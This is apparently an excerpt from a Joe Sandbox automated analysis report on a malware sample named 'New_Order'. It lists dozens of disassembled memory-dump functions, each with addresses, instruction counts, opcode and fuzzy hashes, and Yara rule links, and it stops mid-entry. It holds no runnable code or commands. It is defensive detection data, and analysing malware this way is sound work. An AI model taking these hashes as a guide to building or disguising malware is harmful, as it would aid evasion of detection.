                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 38cd22549c08a71d64d45db569adbb68f8becbc4f8d3ffe557afac2e65562670
                                                                                                • Instruction ID: d9cd90acb833811527c10f97c0950237bade9d148cc998ca55663b79829a24f7
                                                                                                • Opcode Fuzzy Hash: 38cd22549c08a71d64d45db569adbb68f8becbc4f8d3ffe557afac2e65562670
                                                                                                • Instruction Fuzzy Hash: FF010031225646EFE326A26E9898F27AACDEF81394F850064FA008B290DA64DC00C3B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01284690 Relevance: .1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fa35c95366cbe90b86d265946d52d03f5f147039e3811e82aefefb88c0c558f
                                                                                                • Instruction ID: 93a830f0c2d4c37d597f79f95ada4753a047b149c01d0979bebee123a327a149
                                                                                                • Opcode Fuzzy Hash: 2fa35c95366cbe90b86d265946d52d03f5f147039e3811e82aefefb88c0c558f
                                                                                                • Instruction Fuzzy Hash: F611A335262687AFDB29FF59D840F567BA4EB85764F004119FA0487290C370E850CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B6620 Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 54cf081263638a1d0791a16ec6e37aca469c48b2614b1c036892d4a19b2be100
                                                                                                • Instruction ID: 19d6f504366c5ff64d12d982c886dbc4a3c7331f54eb7d82162631476b800dcb
                                                                                                • Opcode Fuzzy Hash: 54cf081263638a1d0791a16ec6e37aca469c48b2614b1c036892d4a19b2be100
                                                                                                • Instruction Fuzzy Hash: 6D11C272A10616AFDB21EF69C9C0BAEFBB8EF88780F500054EB05A7240D734AD018B50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AEA2E Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f157147a8ddb7d4f9a84c5c4cd7a408bdbc605519c2266335067e30119808f5c
                                                                                                • Instruction ID: a0a6d272a36a95795e03949c0c6163dc6b29da6656520873ced45e47e053e4c1
                                                                                                • Opcode Fuzzy Hash: f157147a8ddb7d4f9a84c5c4cd7a408bdbc605519c2266335067e30119808f5c
                                                                                                • Instruction Fuzzy Hash: 8601F17152010A9FC729DF19D448F26BBF9FB91318F22816AE1088B361C770EC42CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AE53E Relevance: .1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                • Instruction ID: c0f783767fe42a80e46eb6c56e0eaf3e1a50e23dddcf04f7042e06d7e11b0097
                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                • Instruction Fuzzy Hash: 6011A5722316C39BEB23972CEA58B357BD4BB41754F5A00E0DF818B752F768D842C260
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130E75D Relevance: .1, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                • Instruction ID: ff4e6d0ba182b981808e66460a197bd7bcccb7e93873c51d581b58af0fe40182
                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                • Instruction Fuzzy Hash: 11019632700115AFEB275F58C810F66BAE9EB85F58F058839EA059B1E0D775DD40DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127A250 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                • Instruction ID: 2792f6ce65453e69b2e7b795c7b29591e6c41095f32bd5f70baab1e569081f17
                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                • Instruction Fuzzy Hash: C501D6715267229BCB318F19DC40A7B7BA5FF55B707048A2DFE959B681D731D800CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d1adb02dd885160531dbb61592b76f0090dd571dc9b4a1e9d666df4d1db8b289
                                                                                                • Instruction ID: cd14dae6484c2c1cbe5e58484e4d7e2629820c776ea70def2ecf52911df3c0a4
                                                                                                • Opcode Fuzzy Hash: d1adb02dd885160531dbb61592b76f0090dd571dc9b4a1e9d666df4d1db8b289
                                                                                                • Instruction Fuzzy Hash: 7D11ED36261641EFDB26EF19CD80F26BBB8FF54B44F210078FA059B2A1C235ED00CA90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01286259 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91fae51573303e5e73fa1d8b59b13bee9a7eb64e5645d492c9914368a260b51b
                                                                                                • Instruction ID: cab2bed8667fcf14f72498e9350533e7c08fe15d5c20ef025d7d80a4241c5ee9
                                                                                                • Opcode Fuzzy Hash: 91fae51573303e5e73fa1d8b59b13bee9a7eb64e5645d492c9914368a260b51b
                                                                                                • Instruction Fuzzy Hash: 23117071551219ABEB25EB64CC42FE97374BF14710F5042D8A318A61E0DB709E91CF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01306050 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dfedaf7a319bafca402dc54be8d78c02ee1cc8f1243103383ce9e449cc00b9ad
                                                                                                • Instruction ID: 8c3fab8967afe4b3a47b7908d52bcb08ad2ff496641aa3b511995e149de6429d
                                                                                                • Opcode Fuzzy Hash: dfedaf7a319bafca402dc54be8d78c02ee1cc8f1243103383ce9e449cc00b9ad
                                                                                                • Instruction Fuzzy Hash: AA111B7290001DABCB16DB94CC84DEF77BCEF48358F044166A506A7211EA34AA15CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128208A Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                • Instruction ID: 711d9b55f0ef94d25bf537f6fc8df0aaee669410215d0a9e562667249792f64d
                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                • Instruction Fuzzy Hash: 44012832621102CBEF15AA2DD880B627767FFE4700F5541A5EE028F286EAB1DC92C390
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01316500 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 76ad92bd95b38537584c478b4020597646a2bf1134af42d3b219903833c407af
                                                                                                • Instruction ID: a67f53dab75ceed5776d9481a585c700a71dc759b78aa36810014daf44f97541
                                                                                                • Opcode Fuzzy Hash: 76ad92bd95b38537584c478b4020597646a2bf1134af42d3b219903833c407af
                                                                                                • Instruction Fuzzy Hash: EF1104B2600146DFD715CF9DC800BA2BBB9FB5A308F088159E848CB319D772EC80CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130C810 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f6d4578948bff85ef3ada08d2401e55d9c302e1801d3b11f4e3061ef5b8a01e
                                                                                                • Instruction ID: 98d0357f01bb7b1636bce78265893663b58d44fe57e49d990838c469f9cd5f59
                                                                                                • Opcode Fuzzy Hash: 0f6d4578948bff85ef3ada08d2401e55d9c302e1801d3b11f4e3061ef5b8a01e
                                                                                                • Instruction Fuzzy Hash: 3E1118B1A102199BCB00DFA9D591AAEBBF8FF58350F10816AB905E7351D674EA018BA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132EA60 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: af71e43ae43dc4bebe7456a618f681d7a38431b5ab51d36da7f72c21a81a65d0
                                                                                                • Instruction ID: 049970b2b38b653b9f15ce97c177106a395b70d674230281250837b3ac97ded1
                                                                                                • Opcode Fuzzy Hash: af71e43ae43dc4bebe7456a618f681d7a38431b5ab51d36da7f72c21a81a65d0
                                                                                                • Instruction Fuzzy Hash: CF01DF71141231EBEB36BB2E9441D3ABBB9FF526A8B04443EE2455B611CB31EC41CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127C020 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                • Instruction ID: e44b057ae8bf3a993768c8246192210194fdf219e3506d24ae36f6bc8afaaf01
                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                • Instruction Fuzzy Hash: 2A01B532120B0B9FEB2396BDE840EA777E9FFC5654F444819EA468B580EA70E541C7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C20F0 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1de92b6f2ebc1b6a98e38d3c79f5debba4fe11adca3836a36f77fb5f21d2f6b3
                                                                                                • Instruction ID: c97f2bf602d0900fe73e6b78fe59ef2182f1ed0e77dc9559428753c9b7bc9e85
                                                                                                • Opcode Fuzzy Hash: 1de92b6f2ebc1b6a98e38d3c79f5debba4fe11adca3836a36f77fb5f21d2f6b3
                                                                                                • Instruction Fuzzy Hash: 5611AD35A1020DEBDF05EF68C851FAFBBB5FB84740F00415CEA059B290DA30AE01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BE5CF Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca2252d0f11180be44cfdb78d7bbc6ddca7aa903c7bc59a161f6c7e77429e48e
                                                                                                • Instruction ID: 750c9bc49a0fa2b761923dacf731a964261a9018bc9abec156054da81ecfb1ec
                                                                                                • Opcode Fuzzy Hash: ca2252d0f11180be44cfdb78d7bbc6ddca7aa903c7bc59a161f6c7e77429e48e
                                                                                                • Instruction Fuzzy Hash: D101A7B1221A56BFDB15BB7ECD80E67BBACFF546A4B000529F20993551DB24EC41C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013169C0 Relevance: .0, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4217dece71cbeabd59d0b826112447935706d8f22409bb0f9bdcb9d9c64f772d
                                                                                                • Instruction ID: 6820e483f99ae4eca3e750004efba1c92fa06c892e6aaad62aaf1d7b32902ed9
                                                                                                • Opcode Fuzzy Hash: 4217dece71cbeabd59d0b826112447935706d8f22409bb0f9bdcb9d9c64f772d
                                                                                                • Instruction Fuzzy Hash: A6014CB32246069BD324EFBDC8899B7FBACFF48664F10462DE95987184E7309911C7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130C460 Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08a3895f1bcd17f60c326f5203b7707051bb5f3985b0da06e26536f6a1b2300b
                                                                                                • Instruction ID: 5d6006b7f5eb81be38a19f593127c327c3ab2e7cfdfa43e3901127fcd49e2d88
                                                                                                • Opcode Fuzzy Hash: 08a3895f1bcd17f60c326f5203b7707051bb5f3985b0da06e26536f6a1b2300b
                                                                                                • Instruction Fuzzy Hash: 91116D71A0024DEBDF16EF68C864EAE7BB9FB48744F014199FD01A7390DA34EA11CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130C97C Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bfb229050db6e1965df5fee15f99dbc815e97903a6165eb3d4981429f3200d07
                                                                                                • Instruction ID: d87068d19f28c3bbdaa41a2ff24ccfdb4702b397eedc7dda20310dad1a9509f2
                                                                                                • Opcode Fuzzy Hash: bfb229050db6e1965df5fee15f99dbc815e97903a6165eb3d4981429f3200d07
                                                                                                • Instruction Fuzzy Hash: C3113C716143499FC710DF69D441A9BBBF8FF99710F00465EBA98D7391D630E900CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0130CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 75749af12f2f2ec46513b09b095774855a92638c5665a2c4053a6ee559588f33
                                                                                                • Instruction ID: 270dc7b8363b2a9de6557aa47a7ee6f9c3ff4931397aacd6d8ed8bd7ec8ab734
                                                                                                • Opcode Fuzzy Hash: 75749af12f2f2ec46513b09b095774855a92638c5665a2c4053a6ee559588f33
                                                                                                • Instruction Fuzzy Hash: C6117C716143089FC710DF69C84195BBBF8FF99750F00865EB958D73A0E630E900CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01354A80 Relevance: .0, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                • Instruction ID: 1beb182db3aea52293f01347e9d659144c0570b6a6b25dfbcb16daefdbe5127e
                                                                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                • Instruction Fuzzy Hash: AA01FC36200705AFE7A9DA6DD844F67B7EAFFC5A14F044419EA428B650FA70F8C0C794
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129E016 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                • Instruction ID: f1667b4d5b41bc244d7d642b23eb189ae16a94e22db7f00adeec398cb2ddd24c
                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                • Instruction Fuzzy Hash: DD018F32224581DFEB26C71DC948F367BD8EF45794F0A04A1FA09DB691EA79DC80C661
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127826B Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4c20dd4200fe07f702d633a3dd4b9accbeb9f9682fdb39fa4c3e6f4d0766de0c
                                                                                                • Instruction ID: 6f9e84677760f3c2fcbcf8ade554129d74e9d81a5093affea885bfc60c300ad7
                                                                                                • Opcode Fuzzy Hash: 4c20dd4200fe07f702d633a3dd4b9accbeb9f9682fdb39fa4c3e6f4d0766de0c
                                                                                                • Instruction Fuzzy Hash: 6D01DF316205459BE724EB6ADC589ABBBF8EF80214B1540699A01A7284EE30D901C691
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132EB50 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f9764ebbc9a041dad5d5ccaa416fed3df0251d19efa0fb1edf23add9051a5ed8
                                                                                                • Instruction ID: 5be796fe5b72cbec6c723ea22b857ea56b7ca56b893e711c7792b8e49bf55043
                                                                                                • Opcode Fuzzy Hash: f9764ebbc9a041dad5d5ccaa416fed3df0251d19efa0fb1edf23add9051a5ed8
                                                                                                • Instruction Fuzzy Hash: 9C01F2B1244721EFD3316B19D842F12BAA8EF54B54F00042EF3069F390C6B198408B54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01282582 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0769717d9e397aaf5c9ab50c2dc94e0ff8cd5329c7aab795dd0a19989f77a2f
                                                                                                • Instruction ID: 6096d3daed197e2eee483079de7a9ae7de5f06db753a403deae54f2817caf23c
                                                                                                • Opcode Fuzzy Hash: e0769717d9e397aaf5c9ab50c2dc94e0ff8cd5329c7aab795dd0a19989f77a2f
                                                                                                • Instruction Fuzzy Hash: 1BF0F432792A11B7D736EB5A9D40F17BAA9EB84B90F004029E60A97640DA74ED01CBB0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AC073 Relevance: .0, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                • Instruction ID: 0fed3b997b4eaa66467e662373940ea12c43f4e4431d14d2233d206320caa691
                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                • Instruction Fuzzy Hash: B3F0C2B2600A11ABD724CF4DDC40E67FBEADBD1B80F048129A645C7220EA31DD04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127C310 Relevance: .0, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                • Instruction ID: de4757e8f192e909540557a8d6255c6114ccc706c664e8cc518fc610e74366c8
                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                • Instruction Fuzzy Hash: 7EF02133274A339BD73257BD5840F3BA5958FD1B64F190035F7099B200C9B48D1157D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BCA6F Relevance: .0, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                • Instruction ID: a758f83da53fe26aec5a2cacfeba2f7bfd3ba75c83493c68a29e7943e649fcff
